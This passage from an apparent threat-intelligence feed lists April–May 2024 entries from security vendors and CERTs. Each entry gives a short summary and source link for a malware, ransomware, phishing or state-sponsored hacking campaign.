Summary:: Google-owned Mandiant researchers have discovered that the Iranian state-sponsored hacker group APT42 is posing as well-known news organizations and think tanks in order to target journalists. The hackers used the identities of The Washington Post, The Economist, and The Jerusalem Post in an ongoing campaign that began in 2021 to obtain login credentials from anyone who clicked on fictitious website links.

Source: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations

Intel Source:: ASEC

Intel Name:: TargetCompany_Ransomware_Group_Expands_Tactics_with_Mallox_Ransomware

Date of Scan:: 2024-05-02

Impact:: MEDIUM

Summary:: ASEC researchers have uncovered a persistent threat posed by the TargetCompany ransomware group, which has been expanding its tactics to target MS-SQL servers. Employing brute force and dictionary attacks, the group installs the Remcos RAT to gain control over systems, followed by the deployment of remote screen control malware. Recently, they attempted to encrypt systems with the Mallox ransomware.

Source: https://asec.ahnlab.com/en/64921/

Intel Source:: Cryptolaemus Group

Intel Name:: Latrodectus_Malware

Date of Scan:: 2024-05-02

Impact:: LOW

Summary:: Latrodectus malware, also known as Unidentified 111 and IceNova, is now being employed in phishing campaigns that exploit Microsoft Azure and Cloudflare themes to bypass email security systems. Initially identified by Walmart's security team and later analyzed by ProofPoint and Team Cymru, this Windows malware downloader functions as a backdoor to download additional payloads or execute commands. Although it is unclear whether Latrodectus will replace the IcedID malware loader, its usage in phishing and contact form spam is on the rise, aimed at infiltrating corporate networks. These phishing attempts often start with reply-chain emails containing malicious PDFs or URLs that mimic legitimate Azure-hosted documents, leading to a deceptive Cloudflare captcha designed to thwart automated security scans and ensure payloads are delivered only to actual users. Upon solving this captcha, a JavaScript file—disguised as a document—downloads an MSI file, which installs a DLL via rundll32.exe into the user’s system, enabling Latrodectus to execute quietly in the background. The malware's potential to drop other malicious software, such as Lumma information-stealer and Danabot, underscores the urgency for infected systems to be isolated and assessed for unusual network activity.

Source: https://github.com/pr0xylife/Latrodectus/blob/main/Latrodectus_29.04.2024.txt

Intel Source:: Palo Alto

Intel Name:: JavaScript_Based_Web_Skimmers_From_Legitimate_Websites

Date of Scan:: 2024-05-02

Impact:: LOW

Summary:: PaloAlto researchers have found several seemingly legitimate websites hosting JavaScript-based webskimmers.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-04-30-examples-of-web-skimmers.txt

Intel Source:: Fortinet

Intel Name:: A_Decade_Old_Flaw_Allows_New_Goldoon_Botnet_to_Target_D_Link_Routers

Date of Scan:: 2024-05-02

Impact:: MEDIUM

Summary:: Fortinet researchers have discovered a new botnet that is aimed at exploiting CVE-2015-2051, a D-Link vulnerability that dates back over ten years. A GetDeviceSettings action on the HNAP interface can be used by remote attackers to carry out arbitrary actions due to this issue. Because of this, a hacker can build an HTTP request and include a malicious command in the header.

Source: https://www.fortinet.com/blog/threat-research/new-goldoon-botnet-targeting-d-link-devices

Intel Source:: Bi.Zone

Intel Name:: Scaly_Wolf_new_loader

Date of Scan:: 2024-05-02

Impact:: LOW

Summary:: The BI.ZONE threat intel analysts discovered a new campaign by the threat group that attacks Russian and Belarusian companies. The BI.ZONE threat intel report provided a recent Scaly Wolf campaign. The group involves phishing emails covered up as communications from government agencies, containing legit documents and password-protected archives with malicious executable files. The executable is a loader that injects the White Snake stealer malware into the explorer.exe process, avoiding detection through anti-virtualization checks and kernel calls instead of WinAPI. The White Snake malware collects credentials and sensitive data from compromised systems.

Source: https://bi-zone.medium.com/scaly-wolfs-new-loader-the-right-tool-for-the-wrong-job-0b36d4c20c88

Intel Source:: Huntress

Intel Name:: Tactics_of_a_Sophisticated_Ransomware_Campaign

Date of Scan:: 2024-05-02

Impact:: MEDIUM

Summary:: Huntress researchers have observed delves into a sophisticated ransomware attack orchestrated by a threat actor with intimate knowledge of targeted infrastructures. The attacker's adeptness in disabling security tools, terminating security applications, and utilizing various tools for malicious purposes highlights their advanced capabilities. Through detailed investigation and proactive monitoring, they identified a consistent pattern of activity across multiple endpoints, enabling timely intervention to prevent ransomware deployment.

Source: https://www.huntress.com/blog/lolbin-to-inc-ransomware

Intel Source:: Zloader

Intel Name:: Zloader_Learns_Old_Tricks

Date of Scan:: 2024-05-02

Impact:: LOW

Summary:: Zloader, also known as Terdot, DELoader, or Silent Night, is a modular trojan derived from the leaked ZeuS source code, first identified in 2015. After nearly two years of dormancy, Zloader resurfaced around September 2023 with updated obfuscation techniques, a revised domain generation algorithm, and enhanced network communication protocols. The latest version, 2.4.1.0, marks the reintroduction of an anti-analysis feature reminiscent of the original ZeuS 2.x code, which restricts the trojan’s execution to the initially infected machine. This blog post examines how this feature, previously abandoned by subsequent variants, has been re-implemented in Zloader to prevent analysis and detection by confining execution to original host machines.

Source: https://www.zscaler.com/blogs/security-research/zloader-learns-old-tricks

Intel Source:: Labs.WithSecure

Intel Name:: A_novel_backdoor_Kapeka

Date of Scan:: 2024-05-02

Impact:: MEDIUM

Summary:: WithSecure has published research about a backdoor called "Kapeka," tracked by Microsoft as "KnuckleTouch," used in attacks in Eastern Europe since mid-2022. Kapeka functions as a versatile backdoor, providing both initial toolkit capabilities and long-term access to victims. Its sophistication suggests involvement by an APT group. WithSecure links Kapeka to Sandworm, tracked by Microsoft as Seashell Blizzard, a notorious Russian nation-state threat group associated with the GRU known for destructive attacks in Ukraine.

Source: https://labs.withsecure.com/publications/kapeka

Intel Source:: JFrog

Intel Name:: Millions_of_Malicious_Repositories_Planted_on_Docker_Hub

Date of Scan:: 2024-05-02

Impact:: MEDIUM

Summary:: JFrog researchers have discovered multiple large scale malware campaigns targeting Docker Hub where millions of imageless repositories with malicious metadata have been planted. As per researchers there are 4.6M repositories on docker hub out of 2.81M were linked to this large malicious campaign. There are 3 main malware campaign were running on Docker Hub. Downloader” and “eBook Phishing” campaigns create fake repositories in batches over a short time period, the “Website SEO” campaign creates a few repositories daily over the whole-time frame and uses a single user per repository.

Source: https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/

Intel Source:: Lumen

Intel Name:: Cuttlefish_Malware

Date of Scan:: 2024-05-01

Impact:: MEDIUM

Summary:: The Black Lotus Labs team at Lumen Technologies has identified a malware platform called Cuttlefish, targeting enterprise-grade SOHO routers. Cuttlefish, active since at least July 2023 with significant activity from October 2023 to April 2024, is a modular malware aimed at stealing authentication data from web requests passing through compromised routers and can perform DNS and HTTP hijacking on internal network communications. Notably, this malware shares code with HiatusRat, linked to the People's Republic of China, though they do not share victim profiles and appear to operate independently. Cuttlefish utilizes a zero-click strategy to capture data, employing packet sniffers designed to target public cloud services and creating proxies or VPN tunnels for data exfiltration, thus evading detection by using stolen credentials. The majority of infections, about 99%, were concentrated in Turkey, primarily via two telecom providers, affecting 600 unique IP addresses, with minimal impact outside Turkey, including some global satellite phone providers and a potential US-based datacenter.

Source: https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware/

Intel Source:: Infoblox

Intel Name:: A_Sophisticated_DNS_Centric_Operation_Linked_to_Chinese_Nation_State_Activity

Date of Scan:: 2024-05-01

Impact:: MEDIUM

Summary:: Researchers from Infoblox presents a groundbreaking study on Muddling Meerkat, a sophisticated actor believed to be a Chinese nation-state entity, conducting extensive operations through DNS queries. The operations, which began around October 2019, involve the utilization of Chinese IP space, manipulation of the Great Firewall, and the creation of false MX records. Despite appearing akin to DNS DDoS attacks, the true motivations behind Muddling Meerkat's activities remain elusive. The research underscores the actor's expertise in DNS manipulation and highlights the challenges in detecting and attributing such complex cyber threats.

Source: https://blogs.infoblox.com/threat-intelligence/a-cunning-operator-muddling-meerkat-and-chinas-great-firewall/

Intel Source:: McAfee

Intel Name:: Dark_Gate_Malware

Date of Scan:: 2024-04-30

Impact:: MEDIUM

Summary:: McAfee Labs has discovered a novel infection chain associated with DarkGate malware. This chain initiates with an HTML-based entry point and advances to exploit the AutoHotkey utility in subsequent stages. DarkGate, identified as a Remote Access Trojan (RAT) and offered as Malware-as-a-Service (MaaS) on a Russian-language cybercrime forum since 2018, harbors a range of malicious functionalities including process injection, file download, and keylogging capabilities. Over the past three months, DarkGate's spread has been observed.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-darkgate-menace-leveraging-autohotkey-attempt-to-evade-smartscreen/

Intel Source:: The DFIR Report

Intel Name:: IcedID_Malware_distributing_through_Phishing_Campaign

Date of Scan:: 2024-04-30

Impact:: MEDIUM

Summary:: Researchers from DFIR leveraged the IcedID malware distributed through a fraudulent Azure download portal, followed by the deployment of a Cobalt Strike beacon. The threat actor established persistence, conducted extensive discovery activities, and initiated lateral movement within the network. They targeted file shares, escalated privileges, and exfiltrated data to AWS S3 buckets. The actor expanded their foothold, explored virtualization infrastructure, and accessed critical administrative utilities. Ultimately, they deployed ransomware across the domain, resulting in significant disruption after a prolonged 684-hour operation.

Source: https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/

Intel Source:: Securonix Threat Labs

Intel Name:: A_New_Ongoing_Attack_Campaign_DEV_POPPER

Date of Scan:: 2024-04-29

Impact:: MEDIUM

Summary:: Securonix researchers have identified the new social engineering attack campaign where attacker luring the software developer through fake interviews to deliver a Python based RAT. Securonix has named this campaign DEV#POPPER. This campaign is likely associated with North Korean threat actor.

Source: https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/

Intel Source:: sophos

Intel Name:: Malware_Campaign_Attempts_Abuse_of_Defender_Binaries

Date of Scan:: 2024-04-29

Impact:: LOW

Summary:: Researchers at Sophos have examined a ransomware campaign that modifies the original content of legitimate Sophos executables and DLLs, replaces the entry-point code, and inserts the decrypted payload as a resource.

Source: https://news.sophos.com/en-us/2024/04/26/malware-campaign-abuses-legit-defender-binaries/

Intel Source:: Esentire

Intel Name:: A_new_malware_FakeBat_Distributing_Through_Fake_Browser_Updates

Date of Scan:: 2024-04-29

Impact:: LOW

Summary:: Researchers at eSentire’s Threat Response Unit have observed new malware campaign named FakeBat loader which is being delivered through hacked websites. These websites have malicious JavaScript that generates fake browser update notifications and these notifications misleading users into believing they need to install real browser updates.

Source: https://www.esentire.com/blog/fakebat-malware-distributing-via-fake-browser-updates

Intel Source:: CERT- AGID

Intel Name:: Anomalies_Following_Disassembly_of_LockBit_Ransomware

Date of Scan:: 2024-04-29

Impact:: HIGH

Summary:: During Operation Cronos in February, an international coalition of law enforcement groups, headed by the National Crime Agency (NCA), took down the LockBit ransomware's activities and infrastructure. The NoMoreRansom project portal offers tools to recover files encrypted by the LockBit ransomware. But it's interesting to note that various European nations, including Italy, have been the target of a large operation to distribute the LockBit 3.0 (LockBit Black) ransomware for the past two days. The email is sent randomly to both public and private entities, with the subject line "documents." It is written in English. An executable for SCR is contained in a ZIP file that is attached to the email.

Source: https://cert-agid.gov.it/news/ransomware-lockbit-anomalie-dopo-lo-smantellamento/

Intel Source:: Fortinet

Intel Name:: Unveiling_The_Tactics_and_Techniques_of_KageNoHitobito_and_DoNex_Ransomware

Date of Scan:: 2024-04-29

Impact:: MEDIUM

Summary:: Researchers from Fortinet have identified the two variant of Ransomware KageNoHitobito and DoNex. KageNoHitobito encrypts files on a machine and asks for money to decrypt them. It uses TOR browser for communicating to victims. It only encrypts files on the computer, not on other connected devices. The encrypted files have a "hitobito" extension. Furthermore, DoNex also encrypts files, but it does it on both the local machine and connected devices. It alters file extensions by appending a victim ID and changes their icons after encryption.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-keganohitobito-and-donex

Intel Source:: Deep Instinct

Intel Name:: Uncorking_Old_Wine

Date of Scan:: 2024-04-29

Impact:: LOW

Summary:: Deep Instinct researchers have unearthed a sophisticated cyber operation targeting Ukraine, leveraging CVE-2017-8570 and a custom loader for Cobalt Strike Beacon. The attack employs a blend of evasion techniques, including obfuscation, anti-analysis methods, and disguised domain names. Despite its complexity, researchers' proactive detection capabilities thwarted the attack on day zero, emphasizing the importance of robust cybersecurity measures.

Source: https://www.deepinstinct.com/blog/uncorking-old-wine-zero-day-cobalt-strike-loader

Intel Source:: Veriti

Intel Name:: Agent_Tesla_Targeting_US_Education_and_Govt_Entities

Date of Scan:: 2024-04-29

Impact:: MEDIUM

Summary:: Researchers at Veriti have noticed that a fresh wave of cyberattacks is focusing on sensitive data held by the US government and educational institutions. Agent Tesla and Taskun are two malware variants that are combined in this campaign. Taskun is the ideal accomplice to Agent Tesla's malicious activities. It functions by undermining the integrity of a system, opening a backdoor that allows Agent Tesla to enter and become persistent. This allows Agent Tesla's hold on the system and maximizes data theft by enabling it to remain undetected for protracted periods of time.

Source: https://veriti.ai/blog/veriti-research/agent-tesla-campaign-targets-us-education-and-government-sectors/

Intel Source:: Canada CA

Intel Name:: Cyberattacks_Affecting_Cisco_ASA_VPNs

Date of Scan:: 2024-04-26

Impact:: MEDIUM

Summary:: The Australian Cyber Security Centre of the Signals Directorate, the Canadian Centre for Cyber Security (Cyber Centre), and the National Cyber Security Centre (NCSC) of the United Kingdom have been assessing persistent hostile cyber activity since the beginning of 2024. This activity has been directed towards virtual private network (VPN) services that are utilized by critical national infrastructure networks and government agencies worldwide. The capabilities point to espionage carried out by a highly skilled and resourceful state-sponsored operator.

Source: https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

Intel Source:: CYFIRMA Research

Intel Name:: The_Path_of_an_Obfuscated_Batch_Script_to_Monero_Mining

Date of Scan:: 2024-04-26

Impact:: LOW

Summary:: Researchers from CYFIRMA have discovered a stealthy miner malware that is present in the wild. To compromise defense systems, this malicious software uses advanced methods like privilege escalation, process injection, and AMSI bypass. The malware notably includes a number of anti-analysis and anti-debugging techniques.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_cyfirma-obfuscated-batch-scripts-journey-activity-7189564988137656320-VNWN?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Huntress

Intel Name:: Unveiling_the_macOS_Variant_of_LightSpy_Malware

Date of Scan:: 2024-04-26

Impact:: LOW

Summary:: Huntress researchers have observed the emergence of LightSpy targeting macOS highlights the evolving landscape of threats against Apple devices. While recent samples uploaded to VirusTotal from India provide some insight, caution is advised in drawing definitive conclusions without additional evidence of active campaigns or specific targeting. Although previous research has linked LightSpy to APT 41, attribution remains complex. Apple's proactive security measures, such as Lockdown Mode and enhanced XProtect modules, underscore the importance of regular updates across all platforms to mitigate emerging threats effectively.

Source: https://www.huntress.com/blog/lightspy-malware-variant-targeting-macos

Intel Source:: WPScan

Intel Name:: A_Malware_Campaign_Targeting_WP_Automatic_Plugin

Date of Scan:: 2024-04-26

Impact:: LOW

Summary:: Researchers from WPScan have discovered a dangerous malware campaign targeting websites that use the WP-Automatic plugin. The campaign exploits a critical vulnerability in versions of the plugin prior to 3.9.2.0, allowing attackers to execute unauthorized database queries via SQL injection (SQLi). This flaw poses a significant risk as attackers can gain admin-level access, upload malicious files, and potentially take control of affected websites.

Source: https://wpscan.com/blog/new-malware-campaign-targets-wp-automatic-plugin/

Intel Source:: Morphisec

Intel Name:: New_Variant_of_IDAT_Loader

Date of Scan:: 2024-04-26

Impact:: LOW

Summary:: Researchers at Morphisec have identified a new variant of IDAT loader, which is utilized to distribute various malware payloads depending on the attacker's analysis of the targeted system. IDAT incorporates distinctive functionalities such as code injection and execution modules, distinguishing it from traditional loaders.

Source: https://blog.morphisec.com/threat-bulletin-new-variant-idat-variant

Intel Source:: Sekoia

Intel Name:: Sinkholing_the_PlugX_USB_Worm_Botnet_by_Unplugging_PlugX

Date of Scan:: 2024-04-26

Impact:: MEDIUM

Summary:: Researchers have sinkholed a command and control server for a variant of the PlugX malware and observed in six months more than 2.5 million connections from unique IP addresses. Since last September, the sinkhole server received over 90,000 requests every day from infected hosts in more than 170 countries.

Source: https://blog.sekoia.io/unplugging-plugx-sinkholing-the-plugx-usb-worm-botnet/#h-indicators-of-compromise

Intel Source:: Securonix Threat Labs

Intel Name:: An_Investigation_of_Ongoing_FROZEN_SHADOW_Attack_Campaign

Date of Scan:: 2024-04-25

Impact:: MEDIUM

Summary:: Securonix researchers discovered an interesting attack campaign that uses SSLoad malware and Cobalt Strike implants, allowing the attackers to pivot and seize control of the entire network domain. Securonix has dubbed the campaign FROZEN#SHADOW. It also includes the use of the ConnectWise ScreenConnect remote desktop software and Cobalt Strike.

Source: https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/

Intel Source:: Cisco Talos

Intel Name:: ArcaneDoor_Unmasked

Date of Scan:: 2024-04-25

Impact:: LOW

Summary:: Cisco Talos researchers have discovered a campaign called "ArcaneDoor" aimed at perimeter network devices made by different companies. These devices are important because they control how data goes in and out of networks. The campaign is run by a skilled group, called UAT4356 by Talos, who use special tools like "Line Runner" and "Line Dancer" to do bad things, like changing settings and spying on network traffic.

Source: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

Intel Source:: ISC.SANS

Intel Name:: Examining_How_Iptables_Configuration_Affects_Honeypot_Data

Date of Scan:: 2024-04-25

Impact:: LOW

Summary:: ISC.SANS researchers have investigated the impact of iptables settings on honeypot efficacy in detecting and evaluating malicious activities. Researchers show how the lack of iptables might reduce the attack surface, resulting in missed possibilities for identifying malware and other malicious behaviors through a comparative examination of honeypot data. The results highlight how crucial iptables is for managing network traffic and how crucial its configuration is for boosting security and facilitating in-depth threat analysis.

Source: https://isc.sans.edu/diary/Does+it+matter+if+iptables+isnt+running+on+my+honeypot/30862/

Intel Source:: Sentinelone

Intel Name:: The_Ransomware_Evolution

Date of Scan:: 2024-04-25

Impact:: LOW

Summary:: Researchers at SentinelOne have studied the ways in which ransomware affiliates have changed over time, concentrating on how they are increasingly utilizing stolen data to make extra money on top of the initial ransom demands. It looks at current examples that shed information on the growing field of cyber extortion, such as the cooperation between affiliates and organizations like Dispossessor, Rabbit Hole, and RansomHub.

Source: https://www.sentinelone.com/blog/ransomware-evolution-how-cheated-affiliates-are-recycling-victim-data-for-profit/

Intel Source:: CYFIRMA Research

Intel Name:: A_Sophisticated_Anti_Analysis_Info_Stealer_Named_Fletchen_Stealer

Date of Scan:: 2024-04-25

Impact:: LOW

Summary:: CYFIRMA researchers identified an information stealer called Fletchen Stealer, a malware designed with sophisticated anti-analysis tactics and sold as a service by its maker, posing a huge cybersecurity concern. The study investigates the variety of anti-analysis strategies used by threat actors to mask the true nature of the malware through in-depth analysis.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_fletchen-stealer-activity-7189234450000445440-V2lj?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Sucuri

Intel Name:: Cookie_hijacking_analysis

Date of Scan:: 2024-04-24

Impact:: LOW

Summary:: Cesar Anjos Sucuri's Malware Researcher wrote in Sucur;'s blog how it’s important to understand what cookie hijacking is, when and how it occurs, and how to protect yourself and your website against it. Cookies usually have sensitive information, including session tokens that authenticate users to a web application. By hijacking the cookies, attackers can impersonate users and gain unauthorized access to private accounts and sensitive data.

Source: https://blog.sucuri.net/2024/04/what-is-cookie-hijacking.html

Intel Source:: Phylum

Intel Name:: A_few_new_publications_to_NPM_campaign

Date of Scan:: 2024-04-24

Impact:: LOW

Summary:: Recently, Phylum Research Team detected and raised a flag for a few new publications belonging to this campaign, with some changes.

Source: https://blog.phylum.io/north-korean-state-actors/

Intel Source:: Trend Micro

Intel Name:: Cracking_Down_Grandoreiro_Banking_Trojan

Date of Scan:: 2024-04-24

Impact:: LOW

Summary:: This month Trend Micro Intel team discussed their contributions to an Interpol-coordinated operation to help Brazilian and Spanish law enforcement agencies analyze malware samples of the Grandoreiro banking trojan. Grandoreiro spreads through phishing emails, malicious attachments, or links leading to fake websites. These emails often mimic legitimate organizations, such as banks or financial institutions, to trick users into downloading and executing the malware.

Source: https://www.trendmicro.com/en_us/research/24/d/trend-micro-collaborated-with-interpol-in-cracking-down-grandore.html

Intel Source:: ASEC

Intel Name:: An_Infostealer_strain_made_with_Electron

Date of Scan:: 2024-04-24

Impact:: LOW

Summary:: ASEC has observed a new Infostealer strain made with Electron. Electron is a framework that lets one develop apps using JavaScript, HTML, and CSS. Discord and Microsoft VSCode are major examples of applications made with Electron. The threat actor in this attack case applied this installer format to the malware.

Source: https://asec.ahnlab.com/en/64445/

Intel Source:: Cyble

Intel Name:: DragonForce_Ransomware_is_linked_to_a_Lockbit_Builder

Date of Scan:: 2024-04-24

Impact:: MEDIUM

Summary:: Cyble Labs identified a DragonForce ransomware binary based on LOCKBIT Black ransomware, suggesting the threat actors behind DragonForce used a leaked builder of LOCKBIT Black ransomware to generate their binary.

Source: https://cyble.com/blog/lockbit-blacks-legacy-unraveling-the-dragonforce-ransomware-connection/

Intel Source:: Seqrite Labs

Intel Name:: Attacks_on_Indian_Government_Are_Increasing_by_Pakistani_APTs

Date of Scan:: 2024-04-24

Impact:: MEDIUM

Summary:: Researchers at Seqrite Labs have uncovered several cyberattack operations in which they have detected the use of different remote access tools (RATs), such as AllaKore RAT and Crimson RAT. They explore the mechanics of these attacks, the actions of the attackers, and the features of the malicious software that is employed. The report also discusses the increase of cyberattacks by Pakistan-affiliated Advanced Persistent Threat (APT) groups, namely SideCopy and APT36 (Transparent Tribe), against Indian government institutions.

Source: https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-labs-unveils-threats-and-connections/

Intel Source:: Avast

Intel Name:: Spearheading_the_Opposition_to_GuptiMiner

Date of Scan:: 2024-04-23

Impact:: MEDIUM

Summary:: Avast Labs researchers have recently uncovered "GuptiMiner," a very sophisticated malware operation that targets corporate networks in specifically. They discovered that GuptiMiner secretly penetrated business networks to release its harmful payloads by taking advantage of a flaw in the eScan antivirus update procedure. Their team worked closely with India CERT and eScan to fix this issue, protecting a great number of users from possible harm.

Source: https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/

Intel Source:: Cert.at

Intel Name:: Double_Agents_of_Malicious_Python_Packages

Date of Scan:: 2024-04-23

Impact:: LOW

Summary:: Researcher Kamil Mankowski continued his journey tracking malicious Python packages used by Oak-Grabber-V2 and provided his analysis on it.

Source: https://cert.at/en/blog/2024/4/double-agents-and-user-agents-navigating-the-realm-of-malicious-python-packages

Intel Source:: Talos

Intel Name:: CoralRaider_threat_actor_continues_to_expand_its_activity

Date of Scan:: 2024-04-23

Impact:: MEDIUM

Summary:: Back in February Cisco Talos observed a new ongoing campaign which was operated by a threat actor who distributed three famous infostealer malware, including Cryptbot, LummaC2, and Rhadamanthys. This time researchers discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.

Source: https://blog.talosintelligence.com/suspected-coralraider-continues-to-expand-victimology-using-three-information-stealers/

Intel Source:: Harfanglab

Intel Name:: Muddywater_campaign_continues_abusing_Atera_Agents

Date of Scan:: 2024-04-23

Impact:: MEDIUM

Summary:: Harfanglab's report details an ongoing campaign by the Iranian state-sponsored threat actor MuddyWater that has been actively exploiting the legitimate remote monitoring and management (RMM) tool Atera Agent since late 2023. The group has been relying on Atera's free trial offers to generate agents registered with compromised email accounts, enabling them to establish remote access to targeted systems without setting up their own infrastructure. The campaign has targeted various sectors across multiple countries through spearphishing emails distributing the malicious Atera Agent installers.

Source: https://harfanglab.io/en/insidethelab/muddywater-rmm-campaign/

Intel Source:: Malware News

Intel Name:: Forest_Blizzards_GooseEgg_strategic_threat

Date of Scan:: 2024-04-23

Impact:: LOW

Summary:: Microsoft Threat Intelligence reveals the clandestine operations of Forest Blizzard, a threat actor group affiliated with the Russian GRU, utilizing the GooseEgg tool to exploit vulnerabilities in the Windows Print Spooler service. Forest Blizzard's strategic targets include government, energy, transportation, and NGO sectors across the US, Europe, and the Middle East.

Source: https://malware.news/t/analyzing-forest-blizzard-s-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/81126

Intel Source:: Securelist

Intel Name:: The_APT_group_ToddyCat_compromise_infrustructure

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: This month, Securelist researchers ran an investigation on how attackers got constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they used for it. ToddyCat is a threat actors group that in general targets governmental organizations located in the Asia-Pacific region. The group’s main goal is to steal sensitive information from hosts.

Source: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/

Intel Source:: Microsoft

Intel Name:: Microsoft_Defender_Exposes_Kubernetes_Vulnerabilities

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: Microsoft Defender recently identified a significant attack targeting Kubernetes workloads leveraging critical vulnerabilities in OpenMetadata for cryptomining. Exploiting flaws disclosed on March 15, 2024, attackers gained access to Kubernetes clusters, executed reconnaissance commands, and deployed cryptomining malware. Microsoft recommends updating OpenMetadata to version 1.3.1 or later, provides guidance for vulnerability checks, and highlights the role of Defender for Cloud in detecting and mitigating such threats, underlining the importance of proactive security measures in containerized environments.

Source: https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/

Intel Source:: CERT-UA

Intel Name:: Sandworm_Groups_Cyber_Scheme

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: Researchers at CERT-UA found that the Sandworm group had a plan to mess with almost 20 important places in March 2024. They wanted to mess up the computer systems that control energy, water, and heat in different parts of Ukraine. CERT-UA also found out that three supply chains were messed with, either because of weak software or because employees from the supplier could get into the systems.

Source: https://cert.gov.ua/article/6278706

Intel Source:: Securonix Threat Lab

Intel Name:: Detecting_DLL_Sideloading_Techniques

Date of Scan:: 2024-04-22

Impact:: MEDIUM

Summary:: In this article, Securonix Threat Lab took a deeper dive into a prevalent “DLL sideloading” attack technique we’ve been observing in real-world attacks, including many of those we discovered, to understand its variations, how it works, and how we can detect it.

Source: https://www.securonix.com/blog/detecting-dll-sideloading-techniques-in-malware-attack-chains/

Intel Source:: Ethical-Empire

Intel Name:: Phishing_attacks_mimicking_Korean_portal_login_pages

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: Researchers from Ethical-Empire spotted phishing attacks coping Korean portal login pages, where fake login screens closely resembled legitimate sites, making them difficult to distinguish at first look by targeting different Korean portals, logistics brands, and webmail services.

Source: https://ethical-empire.com/korean-portal-phishing-scam/

Intel Source:: Gdatasoftware

Intel Name:: The_new_malware_family_Sharp_Stealer

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: Threat researcher Yogesh Londhe discovered a new sample that is called “Sharpil RAT.exe”. That non-obfuscated .NET application with simple stealer functionality led to another sample and the new malware family „Sharp Stealer“. The „Sharpil RAT.exe“ is written in C#, it is running in the background and immediately attempts to establish a connection with a Telegram bot.

Source: https://www.gdatasoftware.com/blog/2024/04/37894-sharp-info-stealer

Intel Source:: Threatdown

Intel Name:: FakeBat_campaign_targeting_VMware_users

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: Threat down researchers spotted a threat actor who’s responsible for multiple malvertising campaigns mimicking popular software downloads. It connected this threat actor with the distribution of stealers, often indirectly using known loaders such as FakeBat for Windows while using Atomic Stealer for Mac. In their latest distribution wave, the threat actor is buying ads on Google search to target VMware users.

Source: https://www.threatdown.com/blog/fakebat-campaign-continues-now-also-targeting-vmware-users/

Intel Source:: Microsoft

Intel Name:: Threat_actor_Forest_Blizzard_recent_activity

Date of Scan:: 2024-04-22

Impact:: MEDIUM

Summary:: After Microsoft Threat Intelligence's investigation of activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) who used a custom tool to elevate privileges and steal credentials in compromised networks. Microsoft has spotted this threat actor abusing GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations.

Source: https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/

Intel Source:: ASEC

Intel Name:: Surge_in_Phishing_Attacks_Impersonating_Korean_Websites

Date of Scan:: 2024-04-22

Impact:: MEDIUM

Summary:: AhnLab's Security Intelligence Center (ASEC) has identified a significant rise in phishing attempts mimicking Korean portal websites, logistics brands, and webmail login pages. These attacks utilize sophisticated tactics, such as replicating the appearance of legitimate websites and leveraging NoCodeForm for credential exfiltration.

Source: https://asec.ahnlab.com/en/64294/

Intel Source:: ISC.SANS

Intel Name:: A_Malicious_PDF_File_Using_to_Deliver_Malware

Date of Scan:: 2024-04-22

Impact:: LOW

Summary:: Researchers at SANS have noted that billions of PDF files are shared on a regular basis, and that many individuals take these files for trust because they believe they are "read-only" and contain just "a bunch of data". Previously, PDF viewers were vulnerable to nasty vulnerabilities in poorly crafted PDF files. Particularly the Acrobat or FoxIt readers, they were all impacted at least once. Additionally, a PDF file can be rather "dynamic" by containing embedded JavaScript scripts, auto-open actions that cause scripts (like PowerShell on Windows) to run, or any other kind of embedded data.

Source: https://isc.sans.edu/diary/Malicious+PDF+File+Used+As+Delivery+Mechanism/30848/

Intel Source:: Ars Technica

Intel Name:: Phishing_campaign_attacks_LastPass_users

Date of Scan:: 2024-04-19

Impact:: LOW

Summary:: The article discusses a recent phishing attack that targeted users of the password manager LastPass. The attack utilized a sophisticated phishing-as-a-service kit called CryptoChameleon, which provided all the necessary resources to deceive even knowledgeable individuals into revealing their master passwords. The attackers used a combination of email, SMS, and voice calls to trick victims into giving up their login credentials. LastPass was just one of the many sensitive services targeted by CryptoChameleon, and the attack was able to bypass multi-factor authentication. The section also mentions previous attacks on LastPass and offers tips for preventing these types of scams from being successful.

Source: https://arstechnica.com/security/2024/04/lastpass-users-targeted-in-phishing-attacks-good-enough-to-trick-even-the-savvy/

Intel Source:: picussecurity

Intel Name:: Threat_Landscape_Update_Exploits_and_Breaches

Date of Scan:: 2024-04-19

Impact:: LOW

